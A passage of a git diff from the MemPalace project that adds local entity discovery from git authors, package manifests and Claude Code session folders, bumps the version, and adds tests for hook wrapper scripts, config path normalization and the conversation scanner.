+    except (OSError, subprocess.SubprocessError):
+        return "", ""
+
+
+def _git_authors(repo: Path) -> list[tuple[str, str]]:
+    out = _run_git(
+        repo,
+        "log",
+        f"--max-count={MAX_COMMITS_PER_REPO}",
+        "--format=%aN|%aE",
+    )
+    result = []
+    for line in out.splitlines():
+        if "|" in line:
+            name, email = line.split("|", 1)
+            result.append((name.strip(), email.strip()))
+    return result
+
+
+# ==================== BOT / NAME FILTERING ====================
+
+
+_BOT_NAME_PATTERNS = [
+    r"\[bot\]",
+    r"^dependabot",
+    r"^renovate",
+    r"^github-actions",
+    r"^actions-user",
+    r"-bot$",
+    r"\bbot$",  # catches "PR Bot", "Release Bot", etc. Not "robot" (no \b)
+    r"^bot-",
+    r"^snyk",
+    r"^greenkeeper",
+    r"^semantic-release",
+    r"^allcontributors",
+    r"-autoroll$",
+    r"^auto-format",
+    r"^pre-commit-ci",
+]
+_BOT_EMAIL_PATTERNS = [
+    # `@users.noreply.github.com` is GitHub's privacy-protected human email —
+    # do NOT filter it. Real bots identify themselves via the display name
+    # (usually containing "[bot]"), which is caught by _BOT_NAME_PATTERNS.
+    r"bot@",
+    r"-bot@",
+    r"\[bot\]@",
+]
+
+_BOT_RE_NAMES = [re.compile(p) for p in _BOT_NAME_PATTERNS]
+_BOT_RE_EMAILS = [re.compile(p) for p in _BOT_EMAIL_PATTERNS]
+
+
+def _is_bot(name: str, email: str) -> bool:
+    ln, le = name.lower(), email.lower()
+    return any(rx.search(ln) for rx in _BOT_RE_NAMES) or any(rx.search(le) for rx in _BOT_RE_EMAILS)
+
+
+def _looks_like_real_name(name: str) -> bool:
+    """Heuristic: a human's name has a space and at least two title-cased parts.
+
+    Filters out handles (lowercase, digits, one-token usernames).
+    """
+    if not name or " " not in name:
+        return False
+    parts = name.split()
+    if len(parts) < 2:
+        return False
+    # First and last parts must start with an uppercase letter
+    return parts[0][:1].isupper() and parts[-1][:1].isupper()
+
+
+# ==================== DIRECTORY WALK ====================
+
+
+def _walk(root: Path, max_depth: int = MAX_DEPTH):
+    for dirpath, dirs, files in os.walk(root):
+        dirs[:] = [d for d in dirs if d not in SKIP_DIRS and not d.startswith(".")]
+        rel = Path(dirpath).relative_to(root)
+        depth = 0 if rel == Path(".") else len(rel.parts)
+        if depth > max_depth:
+            dirs.clear()
+            continue
+        yield Path(dirpath), dirs, files
+
+
+def _has_git_marker(path: Path) -> bool:
+    git_path = path / ".git"
+    return git_path.is_dir() or git_path.is_file()
+
+
+def _manifest_sort_key(entry: tuple[str, str, Path], repo_root: Path) -> tuple[int, int, str]:
+    """Sort manifests by shallowest path first, then known manifest priority,
+    then lexicographic path for deterministic tie-breaking.
+    """
+    manifest_file, _project_name, manifest_dir = entry
+    try:
+        rel = manifest_dir.relative_to(repo_root)
+        depth = len(rel.parts)
+        rel_str = rel.as_posix()
+    except ValueError:
+        depth = MAX_DEPTH + 1
+        rel_str = manifest_dir.as_posix()
+    return (depth, MANIFEST_PRIORITY.get(manifest_file, UNKNOWN_MANIFEST_PRIORITY), rel_str)
+
+
+def find_git_repos(root: Path, max_depth: int = MAX_DEPTH) -> list[Path]:
+    """Return git repo roots under `root` (including root itself if it's a repo)."""
+    root = root.resolve()
+    repos: list[Path] = []
+    if _has_git_marker(root):
+        # Root is a repo — still walk for nested repos (submodules, etc.)
+        repos.append(root)
+    for dirpath, dirs, _ in _walk(root, max_depth):
+        if dirpath == root:
+            continue
+        if _has_git_marker(dirpath):
+            repos.append(dirpath)
+            dirs.clear()  # don't descend into this repo's contents from here
+    return repos
+
+
+def _collect_manifest_names(repo_root: Path) -> list[tuple[str, str, Path]]:
+    """Return (manifest_filename, project_name, dirpath) within a repo.
+
+    Does not descend into nested git repos.
+    """
+    found: list[tuple[str, str, Path]] = []
+    for dirpath, dirs, files in _walk(repo_root):
+        if dirpath != repo_root and _has_git_marker(dirpath):
+            dirs.clear()
+            continue
+        for fname in files:
+            parser = MANIFEST_PARSERS.get(fname)
+            if not parser:
+                continue
+            name = parser(dirpath / fname)
+            if name:
+                found.append((fname, name, dirpath))
+    return sorted(found, key=lambda entry: _manifest_sort_key(entry, repo_root))
+
+
+# ==================== MAIN SCAN ====================
+
+
+class _UnionFind:
+    """Minimal union-find for (name, email) identity resolution."""
+
+    def __init__(self) -> None:
+        self.parent: dict = {}
+
+    def find(self, x):
+        if x not in self.parent:
+            self.parent[x] = x
+            return x
+        root = x
+        while self.parent[root] != root:
+            root = self.parent[root]
+        while self.parent[x] != root:
+            self.parent[x], x = root, self.parent[x]
+        return root
+
+    def union(self, a, b) -> None:
+        ra, rb = self.find(a), self.find(b)
+        if ra != rb:
+            self.parent[ra] = rb
+
+
+def _dedupe_people(
+    all_commits: list[tuple[str, str, str]],
+) -> dict[str, PersonInfo]:
+    """Group commits by identity. Two commits are the same person if they
+    share a name OR an email. Display name = most frequent non-bot variant.
+
+    ``all_commits`` is a list of (name, email, repo_str) triples from every repo.
+    """
+    uf = _UnionFind()
+    for name, email, _repo in all_commits:
+        uf.union(("name", name), ("email", email) if email else ("name", name))
+
+    # Aggregate by component root
+    component_commits: dict = {}
+    for name, email, repo in all_commits:
+        key = uf.find(("name", name))
+        entry = component_commits.setdefault(
+            key, {"name_counts": {}, "emails": set(), "repos": set(), "total": 0}
+        )
+        entry["name_counts"][name] = entry["name_counts"].get(name, 0) + 1
+        if email:
+            entry["emails"].add(email)
+        entry["repos"].add(repo)
+        entry["total"] += 1
+
+    # Pick display name per component: the most-frequent variant that looks
+    # like a real name; fall back to most-frequent overall.
+    people: dict[str, PersonInfo] = {}
+    for _key, entry in component_commits.items():
+        candidates = sorted(entry["name_counts"].items(), key=lambda x: -x[1])
+        display = next(
+            (n for n, _ in candidates if _looks_like_real_name(n)),
+            candidates[0][0],
+        )
+        if not _looks_like_real_name(display):
+            continue  # Skip handles and single-token names
+        # If we already have this display (rare — distinct components with the
+        # same chosen display), merge into the existing entry.
+        existing = people.get(display)
+        if existing:
+            existing.total_commits += entry["total"]
+            existing.emails.update(entry["emails"])
+            existing.repos.update(entry["repos"])
+        else:
+            people[display] = PersonInfo(
+                name=display,
+                total_commits=entry["total"],
+                emails=set(entry["emails"]),
+                repos=set(entry["repos"]),
+            )
+    return people
+
+
+def scan(root: str | os.PathLike) -> tuple[list[ProjectInfo], list[PersonInfo]]:
+    """Scan `root` for projects and people. Returns (projects, people) sorted."""
+    root_path = Path(root).expanduser().resolve()
+    if not root_path.is_dir():
+        return [], []
+
+    repos = find_git_repos(root_path)
+
+    # Identify current user from first repo's git config, fall back to global
+    me_name, me_email = "", ""
+    if repos:
+        me_name, me_email = _git_user_identity(repos[0])
+    if not me_name and not me_email:
+        me_name, me_email = _global_git_identity()
+
+    projects: dict[str, ProjectInfo] = {}
+    all_commits: list[tuple[str, str, str]] = []
+
+    for repo in repos:
+        manifests = _collect_manifest_names(repo)
+        if manifests:
+            manifest_file, proj_name, _ = manifests[0]
+        else:
+            manifest_file, proj_name = None, repo.name
+
+        authors = _git_authors(repo)
+        non_bot_authors = [(name, email) for name, email in authors if not _is_bot(name, email)]
+        total_commits = len(non_bot_authors)
+        user_commits = 0
+        author_counts: dict[str, int] = {}
+        for name, email in non_bot_authors:
+            author_counts[name] = author_counts.get(name, 0) + 1
+            all_commits.append((name, email, str(repo)))
+            if (me_name and name == me_name) or (me_email and email == me_email):
+                user_commits += 1
+
+        is_mine = False
+        if user_commits > 0:
+            sorted_authors = sorted(author_counts.items(), key=lambda x: -x[1])
+            top5 = {n for n, _ in sorted_authors[:5]}
+            if me_name and me_name in top5:
+                is_mine = True
+            elif total_commits and user_commits / total_commits >= 0.10:
+                is_mine = True
+            elif user_commits >= 20:
+                is_mine = True
+
+        proj = ProjectInfo(
+            name=proj_name,
+            repo_root=repo,
+            manifest=manifest_file,
+            has_git=True,
+            total_commits=total_commits,
+            user_commits=user_commits,
+            is_mine=is_mine,
+        )
+        existing = projects.get(proj_name)
+        if existing is None or proj.user_commits > existing.user_commits:
+            projects[proj_name] = proj
+
+    people = _dedupe_people(all_commits)
+
+    # Handle case: root has manifests but no git repo anywhere
+    if not repos:
+        manifests = _collect_manifest_names(root_path)
+        for manifest_file, proj_name, _dirpath in manifests:
+            if proj_name in projects:
+                continue
+            projects[proj_name] = ProjectInfo(
+                name=proj_name,
+                repo_root=root_path,
+                manifest=manifest_file,
+                has_git=False,
+            )
+
+    project_list = sorted(
+        projects.values(),
+        key=lambda p: (not p.is_mine, -p.user_commits, -p.total_commits, p.name),
+    )
+    people_list = sorted(people.values(), key=lambda p: -p.total_commits)
+
+    return project_list, people_list
+
+
+# ==================== ADAPTER ====================
+
+
+def to_detected_dict(
+    projects: list[ProjectInfo],
+    people: list[PersonInfo],
+    project_cap: int = 15,
+    people_cap: int = 15,
+) -> dict:
+    """Convert scan results into the dict shape produced by entity_detector.detect_entities."""
+    proj_entries = [
+        {
+            "name": p.name,
+            "type": "project",
+            "confidence": round(p.confidence, 2),
+            "frequency": p.user_commits or p.total_commits,
+            "signals": [p.to_signal()],
+        }
+        for p in projects[:project_cap]
+    ]
+    people_entries = [
+        {
+            "name": p.name,
+            "type": "person",
+            "confidence": round(p.confidence, 2),
+            "frequency": p.total_commits,
+            "signals": [p.to_signal()],
+        }
+        for p in people[:people_cap]
+    ]
+    return {
+        "people": people_entries,
+        "projects": proj_entries,
+        "uncertain": [],
+    }
+
+
+# ==================== MERGE WITH REGEX DETECTOR ====================
+
+
+def _merge_detected(primary: dict, secondary: dict, drop_secondary_uncertain: bool = False) -> dict:
+    """Merge two detected dicts. Primary entries win on name conflict.
+
+    Dedup is case-insensitive so "mempalace" (manifest name) absorbs "MemPalace"
+    (docs/prose reference) instead of surfacing both.
+
+    If ``drop_secondary_uncertain`` is True, the secondary's uncertain bucket is
+    dropped entirely — useful when the primary signal is strong (real repo
+    found) and we'd rather not ask the user to adjudicate prose-regex noise.
+    """
+    seen = {e["name"].lower() for cat in primary.values() for e in cat}
+    merged = {k: list(v) for k, v in primary.items()}
+    for cat_key in ("people", "projects", "uncertain"):
+        if cat_key == "uncertain" and drop_secondary_uncertain:
+            continue
+        for e in secondary.get(cat_key, []):
+            if e["name"].lower() in seen:
+                continue
+            merged.setdefault(cat_key, []).append(e)
+            seen.add(e["name"].lower())
+    return merged
+
+
+def discover_entities(
+    project_dir: str | os.PathLike,
+    languages: tuple = ("en",),
+    prose_file_cap: int = 10,
+    project_cap: int = 15,
+    people_cap: int = 15,
+    llm_provider: object = None,
+    show_progress: bool = True,
+) -> dict:
+    """Top-level entity discovery: real signals first, prose detection second.
+
+    Returns the same dict shape as ``entity_detector.detect_entities`` so it
+    plugs into ``confirm_entities`` unchanged.
+
+    Order of signal preference:
+      1. Package manifests (package.json, pyproject.toml, Cargo.toml, go.mod)
+         → canonical project names
+      2. Git commit authors → real people with real commit counts
+      3. Claude Code conversation dirs (~/.claude/projects/) → per-session
+         project names (pulled from each session's ``cwd`` metadata)
+      4. Regex entity detection on prose files → supplementary names only
+         mentioned in docs/notes (not code)
+      5. Optional LLM refinement pass — reclassifies ambiguous candidates
+         using the caller-supplied provider
+
+    Passing ``llm_provider`` enables phase-2 refinement. The caller is
+    responsible for constructing the provider (``llm_client.get_provider``)
+    and confirming availability. Refinement is blocking-interactive:
+    progress prints to stderr; Ctrl-C returns partial results.
+    """
+    projects, people = scan(project_dir)
+
+    # If the target is a Claude Code conversations root, extract per-project
+    # entries from there too. Same ProjectInfo shape, so dedup logic works.
+    from mempalace.convo_scanner import is_claude_projects_root, scan_claude_projects
+
+    root_path = Path(project_dir).expanduser().resolve()
+    if is_claude_projects_root(root_path):
+        convo_projects = scan_claude_projects(root_path)
+        # Dedup by name against the git-manifest list, preferring entries
+        # with more user_commits as signal strength. Keyed case-insensitively
+        # so a `pyproject.toml` name like `mempalace` and a Claude Code
+        # `cwd` variant like `MemPalace` collapse into one entry — matches
+        # the case-insensitive dedup used in `_merge_detected` and
+        # `miner.add_to_known_entities`.
+        by_name: dict[str, ProjectInfo] = {p.name.lower(): p for p in projects}
+        for cp in convo_projects:
+            key = cp.name.lower()
+            existing = by_name.get(key)
+            if existing is None or cp.user_commits > existing.user_commits:
+                by_name[key] = cp
+        projects = sorted(
+            by_name.values(),
+            key=lambda p: (not p.is_mine, -p.user_commits, -p.total_commits, p.name),
+        )
+
+    real_signal = to_detected_dict(projects, people, project_cap=project_cap, people_cap=people_cap)
+
+    # Secondary pass: prose-only extraction catches names mentioned in docs
+    # that never made a commit (e.g. a stakeholder or family member in notes).
+    from mempalace.entity_detector import detect_entities, scan_for_detection
+
+    prose_files = scan_for_detection(str(project_dir), max_files=prose_file_cap)
+    prose_detected = (
+        detect_entities(prose_files, languages=languages)
+        if prose_files
+        else {"people": [], "projects": [], "uncertain": []}
+    )
+
+    # Without LLM refinement, suppress regex "uncertain" noise when real
+    # manifest/git signal exists. With LLM refinement enabled, keep those
+    # candidates so the model can promote real entities or drop common words.
+    has_real_signal = bool(projects) or bool(people)
+    merged = _merge_detected(
+        real_signal,
+        prose_detected,
+        drop_secondary_uncertain=has_real_signal and llm_provider is None,
+    )
+
+    # Optional phase 2: LLM refinement.
+    if llm_provider is not None:
+        from mempalace.llm_refine import collect_corpus_text, refine_entities
+
+        corpus = collect_corpus_text(str(project_dir))
+        result = refine_entities(
+            merged,
+            corpus,
+            llm_provider,
+            show_progress=show_progress,
+            allow_project_promotions=not has_real_signal,
+        )
+        if show_progress:
+            status_bits = []
+            if result.cancelled:
+                status_bits.append("cancelled")
+            if result.reclassified:
+                status_bits.append(f"reclassified {result.reclassified}")
+            if result.dropped:
+                status_bits.append(f"dropped {result.dropped}")
+            if result.errors:
+                status_bits.append(f"{len(result.errors)} batch error(s)")
+            if status_bits:
+                import sys as _sys
+
+                print(f"  LLM refine: {', '.join(status_bits)}", file=_sys.stderr)
+        merged = result.merged
+
+    return merged
+
+
+# ==================== CLI ====================
+
+
+if __name__ == "__main__":
+    import sys
+
+    target = sys.argv[1] if len(sys.argv) > 1 else "."
+    projs, ppl = scan(target)
+    print(f"=== PROJECTS ({len(projs)}) ===")
+    for p in projs[:30]:
+        mark = "★" if p.is_mine else " "
+        print(f"  {mark} {p.name:35} conf={p.confidence:.2f}  {p.to_signal()}")
+    print()
+    print(f"=== PEOPLE ({len(ppl)}) ===")
+    for p in ppl[:30]:
+        print(f"    {p.name:30} conf={p.confidence:.2f}  {p.to_signal()}")
diff --git a/mempalace/version.py b/mempalace/version.py
index 69e6e1192..7f40b3185 100644
--- a/mempalace/version.py
+++ b/mempalace/version.py
@@ -1,3 +1,3 @@
 """Single source of truth for the MemPalace package version."""
 
-__version__ = "3.3.2"
+__version__ = "3.3.3"
diff --git a/pyproject.toml b/pyproject.toml
index 96b560473..617c067c4 100644
--- a/pyproject.toml
+++ b/pyproject.toml
@@ -1,6 +1,6 @@
 [project]
 name = "mempalace"
-version = "3.3.2"
+version = "3.3.3"
 description = "Give your AI a memory — mine projects and conversations into a searchable palace. No API key required."
 readme = "README.md"
 requires-python = ">=3.9"
@@ -29,6 +29,7 @@ classifiers = [
 dependencies = [
     "chromadb>=1.5.4,<2",
     "pyyaml>=6.0,<7",
+    "tomli>=2.0.0; python_version < '3.11'",
 ]
 
 [project.urls]
@@ -38,6 +39,7 @@ Repository = "https://github.com/MemPalace/mempalace"
 
 [project.scripts]
 mempalace = "mempalace.cli:main"
+mempalace-mcp = "mempalace.mcp_server:main"
 
 [project.entry-points."mempalace.backends"]
 chroma = "mempalace.backends.chroma:ChromaBackend"
diff --git a/tests/test_claude_plugin_hook_wrappers.py b/tests/test_claude_plugin_hook_wrappers.py
new file mode 100644
index 000000000..e427e0c1f
--- /dev/null
+++ b/tests/test_claude_plugin_hook_wrappers.py
@@ -0,0 +1,192 @@
+"""Execution tests for Claude plugin hook wrapper scripts."""
+
+import os
+import shutil
+import subprocess
+from pathlib import Path
+
+import pytest
+
+REPO_ROOT = Path(__file__).resolve().parents[1]
+PLUGIN_HOOKS_DIR = REPO_ROOT / ".claude-plugin" / "hooks"
+BASH = shutil.which("bash")
+
+pytestmark = pytest.mark.skipif(
+    BASH is None,
+    reason="bash required for Claude plugin hook wrapper tests",
+)
+
+SCRIPT_CASES = [
+    ("mempal-stop-hook.sh", "stop"),
+    ("mempal-precompact-hook.sh", "precompact"),
+]
+
+
+def _shell_path(path: Path) -> str:
+    return path.as_posix()
+
+
+def _write_executable(path: Path, content: str) -> None:
+    path.write_text(content, encoding="utf-8")
+    path.chmod(0o755)
+
+
+def _make_bin_dir(tmp_path: Path, executables: dict[str, str]) -> Path:
+    bin_dir = tmp_path / "bin"
+    bin_dir.mkdir()
+    for name, content in executables.items():
+        _write_executable(bin_dir / name, content)
+    return bin_dir
+
+
+def _capture_stdin_to(output_path: Path) -> str:
+    return (
+        'stdin_payload=""\n'
+        'while IFS= read -r line || [ -n "$line" ]; do\n'
+        '  stdin_payload="${stdin_payload}${line}"\n'
+        "done\n"
+        f'printf \'%s\' "$stdin_payload" > "{_shell_path(output_path)}"\n'
+    )
+
+
+def _run_hook(
+    script_name: str,
+    payload: str,
+    bin_dir: Path,
+) -> subprocess.CompletedProcess[str]:
+    assert BASH is not None
+
+    env = os.environ.copy()
+    env["PATH"] = str(bin_dir)
+
+    return subprocess.run(
+        [BASH, _shell_path(PLUGIN_HOOKS_DIR / script_name)],
+        input=payload,
+        text=True,
+        capture_output=True,
+        cwd=REPO_ROOT,
+        env=env,
+    )
+
+
+@pytest.mark.parametrize(("script_name", "hook_name"), SCRIPT_CASES)
+def test_plugin_hook_wrapper_prefers_mempalace_cli(
+    tmp_path: Path, script_name: str, hook_name: str
+) -> None:
+    args_file = tmp_path / "args.txt"
+    stdin_file = tmp_path / "stdin.json"
+
+    bin_dir = _make_bin_dir(
+        tmp_path,
+        {
+            "mempalace": (
+                "#!/bin/sh\n"
+                f'printf \'%s\' "$*" > "{_shell_path(args_file)}"\n'
+                f"{_capture_stdin_to(stdin_file)}"
+                "printf '{}\\n'\n"
+            ),
+            "python": "#!/bin/sh\nexit 99\n",
+            "python3": "#!/bin/sh\nexit 99\n",
+        },
+    )
+
+    payload = '{"session_id":"abc123"}'
+    result = _run_hook(script_name, payload, bin_dir)
+
+    assert result.returncode == 0
+    assert result.stdout == "{}\n"
+    assert (
+        args_file.read_text(encoding="utf-8")
+        == f"hook run --hook {hook_name} --harness claude-code"
+    )
+    assert stdin_file.read_text(encoding="utf-8") == payload
+
+
+@pytest.mark.parametrize(("script_name", "hook_name"), SCRIPT_CASES)
+@pytest.mark.parametrize("python_name", ["python3", "python"])
+def test_plugin_hook_wrapper_falls_back_to_importable_python(
+    tmp_path: Path, script_name: str, hook_name: str, python_name: str
+) -> None:
+    args_file = tmp_path / "args.txt"
+    stdin_file = tmp_path / "stdin.json"
+
+    python_stub = (
+        "#!/bin/sh\n"
+        'if [ "$1" = "-c" ]; then\n'
+        "  exit 0\n"
+        "fi\n"
+        f'printf \'%s\' "$*" > "{_shell_path(args_file)}"\n'
+        f"{_capture_stdin_to(stdin_file)}"
+        "printf '{}\\n'\n"
+    )
+    bin_dir = _make_bin_dir(tmp_path, {python_name: python_stub})
+
+    payload = '{"session_id":"xyz789"}'
+    result = _run_hook(script_name, payload, bin_dir)
+
+    assert result.returncode == 0
+    assert result.stdout == "{}\n"
+    assert (
+        args_file.read_text(encoding="utf-8")
+        == f"-m mempalace hook run --hook {hook_name} --harness claude-code"
+    )
+    assert stdin_file.read_text(encoding="utf-8") == payload
+
+
+@pytest.mark.parametrize(("script_name", "hook_name"), SCRIPT_CASES)
+def test_plugin_hook_wrapper_errors_cleanly_when_no_runner_exists(
+    tmp_path: Path, script_name: str, hook_name: str
+) -> None:
+    bin_dir = _make_bin_dir(tmp_path, {})
+
+    payload = '{"session_id":"no-runner"}'
+    result = _run_hook(script_name, payload, bin_dir)
+
+    assert result.returncode != 0
+    assert result.stdout == ""
+    assert "could not find a runnable mempalace command or module" in result.stderr
+
+
+@pytest.mark.parametrize(("script_name", "hook_name"), SCRIPT_CASES)
+def test_plugin_hook_wrapper_falls_back_to_python_when_python3_cannot_import(
+    tmp_path: Path, script_name: str, hook_name: str
+) -> None:
+    args_file = tmp_path / "args.txt"
+    stdin_file = tmp_path / "stdin.json"
+    bad_python3_used = tmp_path / "bad_python3_used.txt"
+
+    bin_dir = _make_bin_dir(
+        tmp_path,
+        {
+            "python3": (
+                "#!/bin/sh\n"
+                'if [ "$1" = "-c" ]; then\n'
+                "  exit 1\n"
+                "fi\n"
+                f"printf 'used' > \"{_shell_path(bad_python3_used)}\"\n"
+                "echo 'No module named mempalace' >&2\n"
+                "exit 1\n"
+            ),
+            "python": (
+                "#!/bin/sh\n"
+                'if [ "$1" = "-c" ]; then\n'
+                "  exit 0\n"
+                "fi\n"
+                f'printf \'%s\' "$*" > "{_shell_path(args_file)}"\n'
+                f"{_capture_stdin_to(stdin_file)}"
+                "printf '{}\\n'\n"
+            ),
+        },
+    )
+
+    payload = '{"session_id":"fallback"}'
+    result = _run_hook(script_name, payload, bin_dir)
+
+    assert result.returncode == 0
+    assert result.stdout == "{}\n"
+    assert (
+        args_file.read_text(encoding="utf-8")
+        == f"-m mempalace hook run --hook {hook_name} --harness claude-code"
+    )
+    assert stdin_file.read_text(encoding="utf-8") == payload
+    assert not bad_python3_used.exists()
diff --git a/tests/test_cli.py b/tests/test_cli.py
index c4b420307..1c4dfbda3 100644
--- a/tests/test_cli.py
+++ b/tests/test_cli.py
@@ -334,9 +334,9 @@ def test_mcp_command_prints_setup_guidance(monkeypatch, capsys):
 
     captured = capsys.readouterr()
     assert "MemPalace MCP quick setup:" in captured.out
-    assert "claude mcp add mempalace -- python -m mempalace.mcp_server" in captured.out
+    assert "claude mcp add mempalace -- mempalace-mcp" in captured.out
     assert "\nOptional custom palace:\n" in captured.out
-    assert "python -m mempalace.mcp_server --palace /path/to/palace" in captured.out
+    assert "mempalace-mcp --palace /path/to/palace" in captured.out
     assert "[--palace /path/to/palace]" not in captured.out
     assert captured.err == ""
 
@@ -349,7 +349,7 @@ def test_mcp_command_uses_custom_palace_path_when_provided(monkeypatch, capsys):
     captured = capsys.readouterr()
     expanded = str(Path("~/tmp/my palace").expanduser())
 
-    assert "python -m mempalace.mcp_server --palace" in captured.out
+    assert "mempalace-mcp --palace" in captured.out
     assert expanded in captured.out
     assert "Optional custom palace:" not in captured.out
     assert "[--palace /path/to/palace]" not in captured.out
diff --git a/tests/test_config.py b/tests/test_config.py
index e6dffc352..824f6a8c6 100644
--- a/tests/test_config.py
+++ b/tests/test_config.py
@@ -21,10 +21,62 @@ def test_config_from_file():
 
 
 def test_env_override():
-    os.environ["MEMPALACE_PALACE_PATH"] = "/env/palace"
-    cfg = MempalaceConfig(config_dir=tempfile.mkdtemp())
-    assert cfg.palace_path == "/env/palace"
-    del os.environ["MEMPALACE_PALACE_PATH"]
+    raw = "/env/palace"
+    os.environ["MEMPALACE_PALACE_PATH"] = raw
+    try:
+        cfg = MempalaceConfig(config_dir=tempfile.mkdtemp())
+        # palace_path normalizes with abspath + expanduser to match the
+        # --palace CLI code path. On Unix that's a no-op for "/env/palace";
+        # on Windows abspath prepends the current drive letter.
+        assert cfg.palace_path == os.path.abspath(os.path.expanduser(raw))
+    finally:
+        del os.environ["MEMPALACE_PALACE_PATH"]
+
+
+def test_env_path_expanduser():
+    # Tilde must be expanded to match the --palace CLI code path. We don't
+    # assert "~" is absent from the final string because Windows 8.3 short
+    # paths (e.g. C:\Users\RUNNER~1\...) legitimately contain tildes — the
+    # equality check is authoritative.
+    raw = os.path.join("~", "mempalace-test")
+    os.environ["MEMPALACE_PALACE_PATH"] = raw
+    try:
+        cfg = MempalaceConfig(config_dir=tempfile.mkdtemp())
+        assert cfg.palace_path == os.path.abspath(os.path.expanduser(raw))
+        assert cfg.palace_path.endswith("mempalace-test")
+    finally:
+        del os.environ["MEMPALACE_PALACE_PATH"]
+
+
+def test_env_path_abspath_collapses_traversal():
+    # Build a raw path with a .. segment using the platform separator so
+    # the assertion is portable (Windows uses \, POSIX uses /).
+    raw = os.path.join(tempfile.gettempdir(), "palace", "..", "mempalace-test")
+    expected = os.path.abspath(os.path.expanduser(raw))
+    os.environ["MEMPALACE_PALACE_PATH"] = raw
+    try:
+        cfg = MempalaceConfig(config_dir=tempfile.mkdtemp())
+        # .. segments must be collapsed, not preserved literally.
+        assert ".." not in cfg.palace_path
+        assert cfg.palace_path == expected
+    finally:
+        del os.environ["MEMPALACE_PALACE_PATH"]
+
+
+def test_env_path_legacy_alias_normalized():
+    # Legacy MEMPAL_PALACE_PATH gets the same normalization treatment as
+    # MEMPALACE_PALACE_PATH. We don't assert "~" is absent from the final
+    # string because Windows 8.3 short paths (e.g. C:\Users\RUNNER~1\...)
+    # legitimately contain tildes — the equality check below is authoritative.
+    os.environ.pop("MEMPALACE_PALACE_PATH", None)
+    raw = os.path.join("~", "legacy-alias", "..", "mempalace-test")
+    os.environ["MEMPAL_PALACE_PATH"] = raw
+    try:
+        cfg = MempalaceConfig(config_dir=tempfile.mkdtemp())
+        assert ".." not in cfg.palace_path
+        assert cfg.palace_path == os.path.abspath(os.path.expanduser(raw))
+    finally:
+        del os.environ["MEMPAL_PALACE_PATH"]
 
 
 def test_init():
diff --git a/tests/test_config_extra.py b/tests/test_config_extra.py
index d0d9b5db6..f7418c61a 100644
--- a/tests/test_config_extra.py
+++ b/tests/test_config_extra.py
@@ -63,10 +63,14 @@ def test_save_people_map(tmp_path):
 def test_env_mempal_palace_path(tmp_path):
     """MEMPAL_PALACE_PATH (legacy) should also work."""
     os.environ.pop("MEMPALACE_PALACE_PATH", None)
-    os.environ["MEMPAL_PALACE_PATH"] = "/legacy/path"
+    raw = "/legacy/path"
+    os.environ["MEMPAL_PALACE_PATH"] = raw
     try:
         cfg = MempalaceConfig(config_dir=str(tmp_path))
-        assert cfg.palace_path == "/legacy/path"
+        # palace_path is normalized via abspath + expanduser — compare
+        # against the normalized form so the test is portable between
+        # POSIX (no-op) and Windows (prepends current drive letter).
+        assert cfg.palace_path == os.path.abspath(os.path.expanduser(raw))
     finally:
         del os.environ["MEMPAL_PALACE_PATH"]
 
diff --git a/tests/test_convo_scanner.py b/tests/test_convo_scanner.py
new file mode 100644
index 000000000..01e980b80
--- /dev/null
+++ b/tests/test_convo_scanner.py
@@ -0,0 +1,218 @@
+"""Tests for mempalace.convo_scanner."""
+
+import json
+from pathlib import Path
+
+from mempalace.convo_scanner import (
+    _decode_slug_fallback,
+    _extract_cwd_from_session,
+    _resolve_project_name,
+    _safe_mtime,
+    is_claude_projects_root,
+    scan_claude_projects,
+)
+
+
+# ── is_claude_projects_root ─────────────────────────────────────────────
+
+
+def test_is_claude_projects_root_true(tmp_path):
+    project_dir = tmp_path / "-home-user-dev-foo"
+    project_dir.mkdir()
+    (project_dir / "abc.jsonl").write_text("{}\n")
+    assert is_claude_projects_root(tmp_path)
+
+
+def test_is_claude_projects_root_false_no_dash_prefix(tmp_path):
+    project_dir = tmp_path / "normal-folder"
+    project_dir.mkdir()
+    (project_dir / "abc.jsonl").write_text("{}\n")
+    assert not is_claude_projects_root(tmp_path)
+
+
+def test_is_claude_projects_root_false_no_jsonl(tmp_path):
+    project_dir = tmp_path / "-home-user-foo"
+    project_dir.mkdir()
+    (project_dir / "other.txt").write_text("hello")
+    assert not is_claude_projects_root(tmp_path)
+
+
+def test_is_claude_projects_root_false_empty(tmp_path):
+    assert not is_claude_projects_root(tmp_path)
+
+
+def test_is_claude_projects_root_false_nonexistent(tmp_path):
+    assert not is_claude_projects_root(tmp_path / "does-not-exist")
+
+
+# ── cwd extraction ──────────────────────────────────────────────────────
+
+
+def test_extract_cwd_from_session(tmp_path):
+    f = tmp_path / "session.jsonl"
+    lines = [
+        json.dumps({"type": "file-history-snapshot", "messageId": "x"}),
+        json.dumps({"type": "user", "cwd": "/home/user/dev/myproj", "content": "hi"}),
+    ]
+    f.write_text("\n".join(lines) + "\n")
+    assert _extract_cwd_from_session(f) == "/home/user/dev/myproj"
+
+
+def test_extract_cwd_from_session_skips_malformed(tmp_path):
+    f = tmp_path / "session.jsonl"
+    f.write_text(
+        "{not valid json\n" + json.dumps({"type": "user", "cwd": "/home/user/dev/good"}) + "\n"
+    )
+    assert _extract_cwd_from_session(f) == "/home/user/dev/good"
+
+
+def test_extract_cwd_from_session_none_if_absent(tmp_path):
+    f = tmp_path / "session.jsonl"
+    f.write_text(json.dumps({"type": "x", "messageId": "y"}) + "\n")
+    assert _extract_cwd_from_session(f) is None
+
+
+def test_extract_cwd_from_session_none_if_file_missing(tmp_path):
+    assert _extract_cwd_from_session(tmp_path / "missing.jsonl") is None
+
+
+# ── slug fallback ───────────────────────────────────────────────────────
+
+
+def test_decode_slug_fallback_last_segment():
+    assert _decode_slug_fallback("-home-user-dev-foo") == "foo"
+
+
+def test_decode_slug_fallback_double_dash():
+    assert _decode_slug_fallback("-home-user--bentokit") == "bentokit"
+
+
+def test_decode_slug_fallback_empty():
+    assert _decode_slug_fallback("") == ""
+
+
+def test_decode_slug_fallback_only_dashes():
+    assert _decode_slug_fallback("---") == "---"
+
+
+# ── safe metadata helpers ───────────────────────────────────────────────
+
+
+def test_safe_mtime_returns_zero_on_stat_error(tmp_path, monkeypatch):
+    f = tmp_path / "session.jsonl"
+    f.write_text("{}\n")
+    original_stat = Path.stat
+
+    def fail_stat(self):
+        if self == f:
+            raise OSError("permission denied")
+        return original_stat(self)
+
+    monkeypatch.setattr(Path, "stat", fail_stat)
+    assert _safe_mtime(f) == 0.0
+
+
+# ── _resolve_project_name ───────────────────────────────────────────────
+
+
+def test_resolve_project_name_uses_cwd(tmp_path):
+    pdir = tmp_path / "-home-user-dev-coolproj"
